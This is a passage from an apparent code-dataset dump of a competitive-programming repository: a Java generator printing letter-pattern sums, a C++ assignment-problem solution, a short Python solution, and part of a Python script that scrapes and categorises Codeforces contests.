out.println(\"AAAB+AACC=CBDE\");\n out.println(\"AAAB+AACC=CDBE\");\n out.println(\"AAAB+AACC=CDEA\");\n out.println(\"AAAB+AACC=CDEC\");\n out.println(\"AAAB+AACC=CDED\");\n out.println(\"AAAB+AACC=DCAA\");\n out.println(\"AAAB+AACC=DCBC\");\n out.println(\"AAAB+AACC=DCEC\");\n out.println(\"AAAB+AACC=DCED\");\n out.println(\"AAAB+AACC=DCEE\");\n out.println(\"AAAB+AACC=DEBD\");\n out.println(\"AAAB+AACC=DEFA\");\n out.println(\"AAAB+AACD=BCAA\");\n out.println(\"AAAB+AACD=BCDB\");\n out.println(\"AAAB+AACD=BCEB\");\n out.println(\"AAAB+AACD=BCEE\");\n out.println(\"AAAB+AACD=BDAA\");\n out.println(\"AAAB+AACD=BDEA\");\n out.println(\"AAAB+AACD=BEAA\");\n out.println(\"AAAB+AACD=CBDE\");\n out.println(\"AAAB+AACD=CBEA\");\n out.println(\"AAAB+AACD=CBEB\");\n out.println(\"AAAB+AACD=CBEC\");\n out.println(\"AAAB+AACD=CCBC\");\n out.println(\"AAAB+AACD=CCDC\");\n out.println(\"AAAB+AACD=CDBE\");\n out.println(\"AAAB+AACD=CDEA\");\n out.println(\"AAAB+AACD=CDEC\");\n out.println(\"AAAB+AACD=CDED\");\n out.println(\"AAAB+AACD=CEBB\");\n out.println(\"AAAB+AACD=CEBC\");\n out.println(\"AAAB+AACD=CEBE\");\n out.println(\"AAAB+AACD=CEDC\");\n out.println(\"AAAB+AACD=CEDD\");\n out.println(\"AAAB+AACD=CEDE\");\n out.println(\"AAAB+AACD=DBAA\");\n out.println(\"AAAB+AACD=DBEA\");\n out.println(\"AAAB+AACD=DCAA\");\n out.println(\"AAAB+AACD=DCBD\");\n out.println(\"AAAB+AACD=DCED\");\n out.println(\"AAAB+AACD=DCEE\");\n out.println(\"AAAB+AACD=DEAA\");\n out.println(\"AAAB+AACD=ECBA\");\n out.println(\"AAAB+AACD=ECBB\");\n out.println(\"AAAB+AACD=ECBC\");\n out.println(\"AAAB+AACD=ECBE\");\n out.println(\"AAAB+AACD=ECDA\");\n out.println(\"AAAB+AACD=ECDC\");\n out.println(\"AAAB+AACD=ECDD\");\n out.println(\"AAAB+AACD=ECDE\");\n out.println(\"AAAB+AACD=EFBF\");\n out.println(\"AAAB+AACD=EFDF\");\n out.println(\"AAAB+ABAB=BCDE\");\n out.println(\"AAAB+ABAB=CDBE\");\n out.println(\"AAAB+ABAB=CDDE\");\n out.println(\"AAAB+ABAB=CDEA\");\n out.println(\"AAAB+ABAC=BCDB\");\n 
out.println(\"AAAB+ABAC=BDCA\");\n out.println(\"AAAB+ABAC=BDDA\");\n out.println(\"AAAB+ABAC=BDDE\");\n out.println(\"AAAB+ABAC=BDEA\");\n out.println(\"AAAB+ABAC=BDEB\");\n out.println(\"AAAB+ABAC=DCBA\");\n out.println(\"AAAB+ABAC=DCCA\");\n out.println(\"AAAB+ABAC=DCCE\");\n out.println(\"AAAB+ABAC=DCED\");\n out.println(\"AAAB+ABAC=DEBA\");\n out.println(\"AAAB+ABAC=DEBB\");\n out.println(\"AAAB+ABBA=BAAC\");\n out.println(\"AAAB+ABBA=BCCD\");\n out.println(\"AAAB+ABBB=BAAC\");\n out.println(\"AAAB+ABBB=CDDD\");\n out.println(\"AAAB+ABBB=CDEA\");\n out.println(\"AAAB+ABBB=CDEC\");\n out.println(\"AAAB+ABBC=BAAA\");\n out.println(\"AAAB+ABBC=BADB\");\n out.println(\"AAAB+ABBC=BCCD\");\n out.println(\"AAAB+ABBC=BDCB\");\n out.println(\"AAAB+ABBC=BDCE\");\n out.println(\"AAAB+ABBC=BDDA\");\n out.println(\"AAAB+ABBC=BDDD\");\n out.println(\"AAAB+ABBC=CDCE\");\n out.println(\"AAAB+ABBC=DACB\");\n out.println(\"AAAB+ABBC=DCDE\");\n out.println(\"AAAB+ABBC=DECD\");\n out.println(\"AAAB+ABCA=BADD\");\n out.println(\"AAAB+ABCA=BDAE\");\n out.println(\"AAAB+ABCA=BDEE\");\n out.println(\"AAAB+ABCA=CADE\");\n out.println(\"AAAB+ABCA=CCDE\");\n out.println(\"AAAB+ABCA=CDBE\");\n out.println(\"AAAB+ABCA=CDDE\");\n out.println(\"AAAB+ABCA=CDEA\");\n out.println(\"AAAB+ABCA=CDEC\");\n out.println(\"AAAB+ABCA=CDEE\");\n out.println(\"AAAB+ABCA=CDEF\");\n out.println(\"AAAB+ABCA=DDBA\");\n out.println(\"AAAB+ABCA=DDEC\");\n out.println(\"AAAB+ABCA=DEEC\");\n out.println(\"AAAB+ABCA=DEED\");\n out.println(\"AAAB+ABCA=DEEF\");\n out.println(\"AAAB+ABCB=BADC\");\n out.println(\"AAAB+ABCB=BDBC\");\n out.println(\"AAAB+ABCB=BDDE\");\n out.println(\"AAAB+ABCB=BDED\");\n out.println(\"AAAB+ABCB=CADE\");\n out.println(\"AAAB+ABCB=CCDE\");\n out.println(\"AAAB+ABCB=CDAA\");\n out.println(\"AAAB+ABCB=CDAD\");\n out.println(\"AAAB+ABCB=CDBA\");\n out.println(\"AAAB+ABCB=CDBC\");\n out.println(\"AAAB+ABCB=CDDE\");\n out.println(\"AAAB+ABCB=CDEB\");\n out.println(\"AAAB+ABCB=CDEC\");\n 
out.println(\"AAAB+ABCB=DCAA\");\n out.println(\"AAAB+ABCB=DCEC\");\n out.println(\"AAAB+ABCB=DDBA\");\n out.println(\"AAAB+ABCB=DDBB\");\n out.println(\"AAAB+ABCB=DDEA\");\n out.println(\"AAAB+ABCB=DDEC\");\n out.println(\"AAAB+ABCB=DEAD\");\n out.println(\"AAAB+ABCB=DEBD\");\n out.println(\"AAAB+ABCB=DEDA\");\n out.println(\"AAAB+ABCB=DEDC\");\n out.println(\"AAAB+ABCB=DEEA\");\n out.println(\"AAAB+ABCC=BADA\");\n out.println(\"AAAB+ABCC=BCAB\");\n out.println(\"AAAB+ABCC=BDAA\");\n out.println(\"AAAB+ABCC=BDDE\");\n out.println(\"AAAB+ABCC=BDEE\");\n out.println(\"AAAB+ABCC=CADE\");\n out.println(\"AAAB+ABCC=CCBD\");\n out.println(\"AAAB+ABCC=CDAA\");\n out.println(\"AAAB+ABCC=CDEA\");\n out.println(\"AAAB+ABCC=CDEC\");\n out.println(\"AAAB+ABCC=CDEE\");\n out.println(\"AAAB+ABCC=DAED\");\n out.println(\"AAAB+ABCC=DCEA\");\n out.println(\"AAAB+ABCC=DCED\");\n out.println(\"AAAB+ABCC=DCEE\");\n out.println(\"AAAB+ABCC=DDBC\");\n out.println(\"AAAB+ABCC=DDBE\");\n out.println(\"AAAB+ABCC=DEEA\");\n out.println(\"AAAB+ABCD=BADB\");\n out.println(\"AAAB+ABCD=BCEE\");\n out.println(\"AAAB+ABCD=BDBB\");\n out.println(\"AAAB+ABCD=BDDE\");\n out.println(\"AAAB+ABCD=BEAE\");\n out.println(\"AAAB+ABCD=BEBB\");\n out.println(\"AAAB+ABCD=BEEB\");\n out.println(\"AAAB+ABCD=BEEC\");\n out.println(\"AAAB+ABCD=CADB\");\n out.println(\"AAAB+ABCD=CADE\");\n out.println(\"AAAB+ABCD=CAEA\");\n out.println(\"AAAB+ABCD=CAEC\");\n out.println(\"AAAB+ABCD=CAEE\");\n out.println(\"AAAB+ABCD=CCDE\");\n out.println(\"AAAB+ABCD=CCEA\");\n out.println(\"AAAB+ABCD=CCEB\");\n out.println(\"AAAB+ABCD=CCEC\");\n out.println(\"AAAB+ABCD=CCEE\");\n out.println(\"AAAB+ABCD=CDAE\");\n out.println(\"AAAB+ABCD=CDDA\");\n out.println(\"AAAB+ABCD=CDDB\");\n out.println(\"AAAB+ABCD=CDEA\");\n out.println(\"AAAB+ABCD=CDED\");\n out.println(\"AAAB+ABCD=CEBE\");\n out.println(\"AAAB+ABCD=CEDA\");\n out.println(\"AAAB+ABCD=CEDB\");\n out.println(\"AAAB+ABCD=CEDD\");\n out.println(\"AAAB+ABCD=CEEA\");\n 
out.println(\"AAAB+ABCD=CEEB\");\n out.println(\"AAAB+ABCD=DAEC\");\n out.println(\"AAAB+ABCD=DCBE\");\n out.println(\"AAAB+ABCD=DCEC\");\n out.println(\"AAAB+ABCD=DDAE\");\n out.println(\"AAAB+ABCD=DDBD\");\n out.println(\"AAAB+ABCD=DDEC\");\n out.println(\"AAAB+ABCD=DDEE\");\n out.println(\"AAAB+ABCD=EADB\");\n out.println(\"AAAB+ABCD=EAFB\");\n out.println(\"AAAB+ABCD=EAFC\");\n out.println(\"AAAB+ABCD=EDEE\");\n out.println(\"AAAB+ACAA=BADE\");\n out.println(\"AAAB+ACAA=BDDE\");\n out.println(\"AAAB+ACAA=BDEC\");\n out.println(\"AAAB+ACAA=CBDA\");\n out.println(\"AAAB+ACAA=CDDE\");\n out.println(\"AAAB+ACAA=CDEA\");\n out.println(\"AAAB+ACAA=DABC\");\n out.println(\"AAAB+ACAA=DABE\");\n out.println(\"AAAB+ACAA=DBCE\");\n out.println(\"AAAB+ACAA=DEBD\");\n out.println(\"AAAB+ACAA=DECA\");\n out.println(\"AAAB+ACAA=DECD\");\n out.println(\"AAAB+ACAB=BDEC\");\n out.println(\"AAAB+ACAB=BDED\");\n out.println(\"AAAB+ACAB=CBCD\");\n out.println(\"AAAB+ACAB=CBDA\");\n out.println(\"AAAB+ACAB=CBDB\");\n out.println(\"AAAB+ACAB=CDDC\");\n out.println(\"AAAB+ACAB=CDEA\");\n out.println(\"AAAB+ACAB=CDEB\");\n out.println(\"AAAB+ACAB=CDED\");\n out.println(\"AAAB+ACAB=DABC\");\n out.println(\"AAAB+ACAB=DABD\");\n out.println(\"AAAB+ACAB=DABE\");\n out.println(\"AAAB+ACAB=DBBC\");\n out.println(\"AAAB+ACAB=DBBD\");\n out.println(\"AAAB+ACAB=DBBE\");\n out.println(\"AAAB+ACAB=DBCA\");\n out.println(\"AAAB+ACAB=DBCD\");\n out.println(\"AAAB+ACAB=DEBC\");\n out.println(\"AAAB+ACAB=DEBE\");\n out.println(\"AAAB+ACAB=DECA\");\n out.println(\"AAAB+ACAB=DECB\");\n out.println(\"AAAB+ACAB=DECD\");\n out.println(\"AAAB+ACAC=CBDC\");\n out.println(\"AAAB+ACAC=CDBA\");\n out.println(\"AAAB+ACAC=CDDA\");\n out.println(\"AAAB+ACAC=CDDE\");\n out.println(\"AAAB+ACAC=CDEA\");\n out.println(\"AAAB+ACAC=CDEC\");\n out.println(\"AAAB+ACAC=DBBA\");\n out.println(\"AAAB+ACAC=DBBE\");\n out.println(\"AAAB+ACAC=DBCA\");\n out.println(\"AAAB+ACAC=DBED\");\n out.println(\"AAAB+ACAC=DECA\");\n 
out.println(\"AAAB+ACAC=DECC\");\n out.println(\"AAAB+ACAD=BADA\");\n out.println(\"AAAB+ACAD=BADE\");\n out.println(\"AAAB+ACAD=BDCE\");\n out.println(\"AAAB+ACAD=BDDA\");\n out.println(\"AAAB+ACAD=BDDE\");\n out.println(\"AAAB+ACAD=BECB\");\n out.println(\"AAAB+ACAD=BEDC\");\n out.println(\"AAAB+ACAD=BEDE\");\n out.println(\"AAAB+ACAD=CBBA\");\n out.println(\"AAAB+ACAD=CBBC\");\n out.println(\"AAAB+ACAD=CBBE\");\n out.println(\"AAAB+ACAD=CBDC\");\n out.println(\"AAAB+ACAD=CBDD\");\n out.println(\"AAAB+ACAD=CBDE\");\n out.println(\"AAAB+ACAD=CBEB\");\n out.println(\"AAAB+ACAD=CDBB\");\n out.println(\"AAAB+ACAD=CDBC\");\n out.println(\"AAAB+ACAD=CDBE\");\n out.println(\"AAAB+ACAD=CDDA\");\n out.println(\"AAAB+ACAD=CDDC\");\n out.println(\"AAAB+ACAD=CDDE\");\n out.println(\"AAAB+ACAD=CDED\");\n out.println(\"AAAB+ACAD=CEBA\");\n out.println(\"AAAB+ACAD=CEBB\");\n out.println(\"AAAB+ACAD=CEDA\");\n out.println(\"AAAB+ACAD=CEDD\");\n out.println(\"AAAB+ACAD=DABA\");\n out.println(\"AAAB+ACAD=DABE\");\n out.println(\"AAAB+ACAD=DBBA\");\n out.println(\"AAAB+ACAD=DBBE\");\n out.println(\"AAAB+ACAD=DBCE\");\n out.println(\"AAAB+ACAD=DEBC\");\n out.println(\"AAAB+ACAD=DEBE\");\n out.println(\"AAAB+ACAD=DECD\");\n out.println(\"AAAB+ACAD=EBBA\");\n out.println(\"AAAB+ACAD=EBCA\");\n out.println(\"AAAB+ACAD=EBCB\");\n out.println(\"AAAB+ACAD=EDCA\");\n out.println(\"AAAB+ACAD=EDCD\");\n out.println(\"AAAB+ACAD=EDDA\");\n out.println(\"AAAB+ACBA=BADE\");\n out.println(\"AAAB+ACBA=BBCD\");\n out.println(\"AAAB+ACBA=BDAD\");\n out.println(\"AAAB+ACBA=BDEC\");\n out.println(\"AAAB+ACBA=BDED\");\n out.println(\"AAAB+ACBA=CBAA\");\n out.println(\"AAAB+ACBA=CDED\");\n out.println(\"AAAB+ACBA=CDEF\");\n out.println(\"AAAB+ACBA=DECF\");\n out.println(\"AAAB+ACBB=BBCD\");\n out.println(\"AAAB+ACBB=BBDC\");\n out.println(\"AAAB+ACBB=BDAC\");\n out.println(\"AAAB+ACBB=BDCE\");\n out.println(\"AAAB+ACBB=BDEC\");\n out.println(\"AAAB+ACBB=BDED\");\n out.println(\"AAAB+ACBB=CADA\");\n 
out.println(\"AAAB+ACBB=CADD\");\n out.println(\"AAAB+ACBB=CBAB\");\n out.println(\"AAAB+ACBB=CBDA\");\n out.println(\"AAAB+ACBB=CBDC\");\n out.println(\"AAAB+ACBB=CDCE\");\n out.println(\"AAAB+ACBB=CDDE\");\n out.println(\"AAAB+ACBB=CDEC\");\n out.println(\"AAAB+ACBB=DAED\");\n out.println(\"AAAB+ACBB=DBCA\");\n out.println(\"AAAB+ACBB=DBCC\");\n out.println(\"AAAB+ACBB=DBCE\");\n out.println(\"AAAB+ACBB=DBEC\");\n out.println(\"AAAB+ACBB=DDAD\");\n out.println(\"AAAB+ACBB=DDCD\");\n out.println(\"AAAB+ACBB=DDEA\");\n out.println(\"AAAB+ACBB=DDED\");\n out.println(\"AAAB+ACBB=DDEE\");\n out.println(\"AAAB+ACBB=DEDC\");\n out.println(\"AAAB+ACBB=DEEA\");\n out.println(\"AAAB+ACBB=DEED\");\n out.println(\"AAAB+ACBC=BADE\");\n out.println(\"AAAB+ACBC=BBCD\");\n out.println(\"AAAB+ACBC=BDAA\");\n out.println(\"AAAB+ACBC=BDEA\");\n out.println(\"AAAB+ACBC=BDEB\");\n out.println(\"AAAB+ACBC=BDEE\");\n out.println(\"AAAB+ACBC=CADA\");\n out.println(\"AAAB+ACBC=CBAC\");\n out.println(\"AAAB+ACBC=CDAA\");\n out.println(\"AAAB+ACBC=CDDE\");\n out.println(\"AAAB+ACBC=CDEE\");\n out.println(\"AAAB+ACBC=DAED\");\n out.println(\"AAAB+ACBC=DBEA\");\n out.println(\"AAAB+ACBC=DBED\");\n out.println(\"AAAB+ACBC=DBEE\");\n out.println(\"AAAB+ACBC=DDCB\");\n out.println(\"AAAB+ACBC=DDCE\");\n out.println(\"AAAB+ACBC=DEEA\");\n out.println(\"AAAB+ACBD=BADB\");\n out.println(\"AAAB+ACBD=BAEE\");\n out.println(\"AAAB+ACBD=BBCA\");\n out.println(\"AAAB+ACBD=BBCC\");\n out.println(\"AAAB+ACBD=BBEA\");\n out.println(\"AAAB+ACBD=BBEB\");\n out.println(\"AAAB+ACBD=BBEE\");\n out.println(\"AAAB+ACBD=BDCC\");\n out.println(\"AAAB+ACBD=BDDB\");\n out.println(\"AAAB+ACBD=BDDE\");\n out.println(\"AAAB+ACBD=BDEE\");\n out.println(\"AAAB+ACBD=BECE\");\n out.println(\"AAAB+ACBD=BEDB\");\n out.println(\"AAAB+ACBD=BEDE\");\n out.println(\"AAAB+ACBD=BEEB\");\n out.println(\"AAAB+ACBD=CADB\");\n out.println(\"AAAB+ACBD=CBEE\");\n out.println(\"AAAB+ACBD=CDCB\");\n out.println(\"AAAB+ACBD=CDEC\");\n 
out.println(\"AAAB+ACBD=CECB\");\n out.println(\"AAAB+ACBD=CEEB\");\n out.println(\"AAAB+ACBD=DADE\");\n out.println(\"AAAB+ACBD=DBAA\");\n out.println(\"AAAB+ACBD=DBAC\");\n out.println(\"AAAB+ACBD=DBAE\");\n out.println(\"AAAB+ACBD=DBCA\");\n out.println(\"AAAB+ACBD=DBEA\");\n out.println(\"AAAB+ACBD=DBEE\");\n out.println(\"AAAB+ACBD=DDAA\");\n out.println(\"AAAB+ACBD=DDCA\");\n out.println(\"AAAB+ACBD=DDCC\");\n out.println(\"AAAB+ACBD=DDCE\");\n out.println(\"AAAB+ACBD=DDEF\");\n out.println(\"AAAB+ACBD=DECA\");\n out.println(\"AAAB+ACBD=DECF\");\n out.println(\"AAAB+ACBD=EADB\");\n out.println(\"AAAB+ACBD=EAFB\");\n out.println(\"AAAB+ACBD=EBCA\");\n out.println(\"AAAB+ACBD=EBFF\");\n out.println(\"AAAB+ACBD=EDCC\");\n out.println(\"AAAB+ACBD=EDDE\");\n out.println(\"AAAB+ACBD=EEDE\");\n out.println(\"AAAB+ACBD=EEDF\");\n out.println(\"AAAB+ACBD=EFCC\");\n out.println(\"AAAB+ACCA=BDBE\");\n out.println(\"AAAB+ACCA=BDEC\");\n out.println(\"AAAB+ACCA=CABD\");\n out.println(\"AAAB+ACCA=CADA\");\n out.println(\"AAAB+ACCA=CADC\");\n out.println(\"AAAB+ACCA=CBDE\");\n out.println(\"AAAB+ACCA=CDBA\");\n out.println(\"AAAB+ACCA=CDDD\");\n out.println(\"AAAB+ACCA=CDEC\");\n out.println(\"AAAB+ACCA=DABA\");\n out.println(\"AAAB+ACCA=DADC\");\n out.println(\"AAAB+ACCA=DBDE\");\n out.println(\"AAAB+ACCB=BDBC\");\n out.println(\"AAAB+ACCB=BDBE\");\n out.println(\"AAAB+ACCB=BDED\");\n out.println(\"AAAB+ACCB=BDEE\");\n out.println(\"AAAB+ACCB=CAAA\");\n out.println(\"AAAB+ACCB=CABD\");\n out.println(\"AAAB+ACCB=CADA\");\n out.println(\"AAAB+ACCB=CADB\");\n out.println(\"AAAB+ACCB=CADE\");\n out.println(\"AAAB+ACCB=CBBD\");\n out.println(\"AAAB+ACCB=CBDA\");\n out.println(\"AAAB+ACCB=CBDE\");\n out.println(\"AAAB+ACCB=CDBB\");\n out.println(\"AAAB+ACCB=CDBC\");\n out.println(\"AAAB+ACCB=CDDA\");\n out.println(\"AAAB+ACCB=CDDD\");\n out.println(\"AAAB+ACCB=CDEC\");\n out.println(\"AAAB+ACCB=CDED\");\n out.println(\"AAAB+ACCB=CDEE\");\n out.println(\"AAAB+ACCB=DABA\");\n 
out.println(\"AAAB+ACCB=DABB\");\n out.println(\"AAAB+ACCB=DABC\");\n out.println(\"AAAB+ACCB=DABE\");\n out.println(\"AAAB+ACCB=DADC\");\n out.println(\"AAAB+ACCB=DADD\");\n out.println(\"AAAB+ACCB=DBDA\");\n out.println(\"AAAB+ACCB=DBDE\");\n out.println(\"AAAB+ACCB=DEBC\");\n out.println(\"AAAB+ACCB=DEDA\");\n out.println(\"AAAB+ACCC=BDBE\");\n out.println(\"AAAB+ACCC=CAAA\");\n out.println(\"AAAB+ACCC=CADC\");\n out.println(\"AAAB+ACCC=CBBD\");\n out.println(\"AAAB+ACCC=CDBC\");\n out.println(\"AAAB+ACCC=CDBE\");\n out.println(\"AAAB+ACCC=CDDA\");\n out.println(\"AAAB+ACCC=CDDD\");\n out.println(\"AAAB+ACCC=DABC\");\n out.println(\"AAAB+ACCC=DBDE\");\n out.println(\"AAAB+ACCC=DEBD\");\n out.println(\"AAAB+ACCD=BABA\");\n out.println(\"AAAB+ACCD=BABC\");\n out.println(\"AAAB+ACCD=BADB\");\n out.println(\"AAAB+ACCD=CABA\");\n out.println(\"AAAB+ACCD=CABB\");\n out.println(\"AAAB+ACCD=CABC\");\n out.println(\"AAAB+ACCD=CADA\");\n out.println(\"AAAB+ACCD=CADC\");\n out.println(\"AAAB+ACCD=CADD\");\n out.println(\"AAAB+ACCD=CBDB\");\n out.println(\"AAAB+ACCD=CBDE\");\n out.println(\"AAAB+ACCD=CDBD\");\n out.println(\"AAAB+ACCD=CDBE\");\n out.println(\"AAAB+ACCD=CEBC\");\n out.println(\"AAAB+ACCD=CEDC\");\n out.println(\"AAAB+ACCD=DABD\");\n out.println(\"AAAB+ACCD=DADA\");\n out.println(\"AAAB+ACCD=DADC\");\n out.println(\"AAAB+ACDA=BABE\");\n out.println(\"AAAB+ACDA=BAEE\");\n out.println(\"AAAB+ACDA=BBAE\");\n out.println(\"AAAB+ACDA=BBCD\");\n out.println(\"AAAB+ACDA=BBEE\");\n out.println(\"AAAB+ACDA=BDCC\");\n out.println(\"AAAB+ACDA=BDED\");\n out.println(\"AAAB+ACDA=BEAE\");\n out.println(\"AAAB+ACDA=BEBC\");\n out.println(\"AAAB+ACDA=BEED\");\n out.println(\"AAAB+ACDA=CABA\");\n out.println(\"AAAB+ACDA=CBCA\");\n out.println(\"AAAB+ACDA=CBCD\");\n out.println(\"AAAB+ACDA=CBCE\");\n out.println(\"AAAB+ACDA=CDAC\");\n out.println(\"AAAB+ACDA=CDEC\");\n out.println(\"AAAB+ACDA=CDEE\");\n out.println(\"AAAB+ACDA=CEAC\");\n out.println(\"AAAB+ACDA=CEAE\");\n 
out.println(\"AAAB+ACDA=CECA\");\n out.println(\"AAAB+ACDA=CEEA\");\n out.println(\"AAAB+ACDA=CEEC\");\n out.println(\"AAAB+ACDA=CEED\");\n out.println(\"AAAB+ACDA=DABA\");\n out.println(\"AAAB+ACDA=DAED\");\n out.println(\"AAAB+ACDA=DAEE\");\n out.println(\"AAAB+ACDA=DBBA\");\n out.println(\"AAAB+ACDA=DBBE\");\n out.println(\"AAAB+ACDA=DDBE\");\n out.println(\"AAAB+ACDA=DDCC\");\n out.println(\"AAAB+ACDA=DDEA\");\n out.println(\"AAAB+ACDA=DDEC\");\n out.println(\"AAAB+ACDA=DDEE\");\n out.println(\"AAAB+ACDA=DEBA\");\n out.println(\"AAAB+ACDA=DEBE\");\n out.println(\"AAAB+ACDA=DECC\");\n out.println(\"AAAB+ACDA=DECE\");\n out.println(\"AAAB+ACDA=DEEA\");\n out.println(\"AAAB+ACDA=EABA\");\n out.println(\"AAAB+ACDA=EAFA\");\n out.println(\"AAAB+ACDA=EAFF\");\n out.println(\"AAAB+ACDA=EFAF\");\n out.println(\"AAAB+ACDB=BABD\");\n out.println(\"AAAB+ACDB=BABE\");\n out.println(\"AAAB+ACDB=BAED\");\n out.println(\"AAAB+ACDB=BBAC\");\n out.println(\"AAAB+ACDB=BBAE\");\n out.println(\"AAAB+ACDB=BBCC\");\n out.println(\"AAAB+ACDB=BBEC\");\n out.println(\"AAAB+ACDB=BDCD\");\n out.println(\"AAAB+ACDB=BDEE\");\n out.println(\"AAAB+ACDB=BEAC\");\n out.println(\"AAAB+ACDB=BEBE\");\n out.println(\"AAAB+ACDB=BEEC\");\n out.println(\"AAAB+ACDB=BEEE\");\n out.println(\"AAAB+ACDB=CABA\");\n out.println(\"AAAB+ACDB=CABB\");\n out.println(\"AAAB+ACDB=CABE\");\n out.println(\"AAAB+ACDB=CBAC\");\n out.println(\"AAAB+ACDB=CBBA\");\n out.close();\n }\n}\n" }, { "alpha_fraction": 0.3583868145942688, "alphanum_fraction": 0.3748854398727417, "avg_line_length": 19.018348693847656, "blob_id": "a452501d41b341e2bf127c7e4df9bf99b7e98030", "content_id": "b02dfea57492e92614a0fa08b0b88ebd8e474073", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2182, "license_type": "no_license", "max_line_length": 66, "num_lines": 109, "path": "/trash/lab_da_smthng/minimax/Dminimax.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include 
<cstdlib>\n#include <iostream>\n#include <stack>\n#include <vector>\n#include <stdio.h>\n#include <queue>\n\nusing namespace std;\n\nconst int INF = 1000000001;\nint n;\nvector< vector< int > > a;\nvector<int> dr, dc, p, minpos, minv;\nvector<bool> vis;\n\nint dfs(int k, int m)\n{\n vis[k] = true;\n int t = p[k];\n int temp = k;\n int d = INF;\n for (int j = 1; j <= n; j++)\n if (!vis[j])\n {\n if (a[t][j] >= m && a[t][j] - dr[t] - dc[j] < minv[j])\n {\n minv[j] = a[t][j] - dr[t] - dc[j];\n minpos[j] = k;\n }\n if (minv[j] < d)\n {\n d = minv[j];\n temp = j;\n }\n }\n for (int j = 0; j <= n; j++)\n if (vis[j])\n {\n dr[p[j]] += d;\n dc[j] -= d;\n } else\n minv[j] -= d;\n return p[temp] != 0 ? dfs(temp, m) : temp;\n}\n\nvoid rec(int k)\n{\n p[k] = p[minpos[k]];\n if (minpos[k] != 0)\n rec(minpos[k]);\n}\n\nint ans(int m)\n{\n dr.clear();\n dc.clear();\n p.clear();\n minpos.clear();\n dr.resize(n + 1);\n dc.resize(n + 1);\n p.resize(n + 1);\n minpos.resize(n + 1);\n for (int i = 1; i <= n; i++)\n {\n p[0] = i;\n minv.clear();\n vis.clear();\n minv.resize(n + 1, INF);\n vis.resize(n + 1, false);\n rec(dfs(0, m));\n }\n for (int i = 1; i <= n; i++)\n if (a[i][p[i]] < m)\n return -1;\n return 1;\n}\n\nint main()\n{\n freopen(\"minimax.in\", \"r\", stdin);\n freopen(\"minimax.out\", \"w+\", stdout);\n scanf(\"%d\\n\", &n);\n a.resize(n + 1);\n int mx = -1, mn = INF;\n for (int i = 1; i <= n; i++)\n {\n a[i].resize(n + 1);\n for (int j = 1; j <= n; j++)\n scanf(\"%d\", &a[i][j]),\n mx = max(mx, a[i][j]),\n mn = min(mn, a[i][j]);\n scanf(\"\\n\");\n }\n int l = mn, r = mx, m;\n while (l < r)\n {\n if (l == r - 1)\n {\n ans(r) > 0 ? m = r : m = l;\n break;\n }\n m = (r + l) / 2;\n ans(m) > 0 ? 
l = m : r = m;\n }\n printf(\"%d\\n\", m);\n fclose(stdin);\n fclose(stdout);\n return 0;\n}\n" }, { "alpha_fraction": 0.34210526943206787, "alphanum_fraction": 0.4263157844543457, "avg_line_length": 37, "blob_id": "6a3f8d0fc6aad2161840497901dfddbc822c0054", "content_id": "98e99995778cf33ee8b21146e7acdc5f866a27a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 190, "license_type": "no_license", "max_line_length": 95, "num_lines": 5, "path": "/trains/train2015western/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "q1, p1, q2, p2, a = map(int, input().split())\nans = 2 ** 60\nfor i in range(a + 1):\n ans = min(ans, (i // q1 + (i % q1 != 0)) * p1 + ((a - i) // q2 + ((a - i) % q2 != 0)) * p2)\nprint(ans)\n" }, { "alpha_fraction": 0.5483964085578918, "alphanum_fraction": 0.5635654330253601, "avg_line_length": 30.75229263305664, "blob_id": "aa10aad5f5580183716929fe2895670384b80154", "content_id": "0e788edf95e55f9624d6ace02a40890fce486a12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6946, "license_type": "no_license", "max_line_length": 136, "num_lines": 218, "path": "/scripts/cf/registrants.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nsys.path.append('/home/igorjan/206round/scripts')\n\nfrom library import *\nfrom plotSubmits import cf\nfrom bs4 import BeautifulSoup\nimport re\nfrom datetime import datetime\nimport time\n\nfilename = '/home/igorjan/.cache/cf/contests.json'\nparticipantsFile = '/home/igorjan/.cache/cf/participants.json'\nDATE_FORMAT = '%d.%m.%Y %H:%M'\n\ndiv1 = []\ndiv2 = []\ndiv3 = []\ndiv4 = []\neduc = []\ncomb = []\nothe = []\n\ndef addRound(round):\n title = round[3]\n def check(s):\n return re.findall(s, title)\n if check(r'unrated') or check(r'неофициальная') or check('Testing') or check('Experimental'):\n return\n d1 = check(r'Div. ?1')\n d2 = check(r'Div. 
?2') or check(r'Див. ?2') or check(r'Дивизион 2')\n d3 = check(r'Div. ?3')\n d4 = check(r'Div. ?4')\n ed = check('Edu')\n if ed:\n toAppend = educ\n elif d3:\n toAppend = div3\n elif d4:\n toAppend = div4\n elif d1 and d2:\n toAppend = comb\n elif d1:\n toAppend = div1\n elif d2:\n toAppend = div2\n elif check(r'Global') or check(r'Hello') or check(r'Good Bye') or check(r'Beta Round') or check('Alpha Round'):\n toAppend = comb\n else:\n toAppend = othe\n for i in range(len(toAppend)):\n if toAppend[i][3] == title:\n return\n toAppend.append(round)\n\nparticipants_all = loadJsonFromFile(participantsFile)\ndiv1, div2, div3, div4, educ, comb, othe = loadJsonFromFile(filename)\n\ndef getParticipants(contestId):\n print('Getting contest', contestId)\n contest = cf('contest.standings', contestId = contestId, lang = 'en')\n time.sleep(1)\n if not contest: return\n contest = contest.result\n participants_all[contestId] = len(contest.rows)\n saveJsonInFile(contest, f'/home/igorjan/.cache/cf/contests/{contestId}.json')\n saveJsonInFile(participants_all, participantsFile)\n\nload = len(sys.argv) >= 2 and sys.argv[1] == '--load'\nif load:\n for i in range(1, 1000):\n stop = False\n url = f'https://codeforces.com/contests/page/{i}?locale=ru&complete=true'\n print(f'Loading {i}-th page of contests')\n html = requests.get(url).text.split('\\n', 2)[2]\n page = BeautifulSoup(html, 'html5lib')\n for tr in page.body.find('div', attrs={'class': 'contests-table'}).find('div', attrs={'class': 'datatable'}).find_all('tr'):\n cid = tr.get('data-contestid')\n if not cid: continue\n if cid in participants_all:\n stop = True\n break\n getParticipants(cid)\n date = tr.find('span', attrs={'class': 'format-date'}).contents[0]\n title = tr.td.contents[0].strip()\n count = int(tr.find('a', attrs={'class': 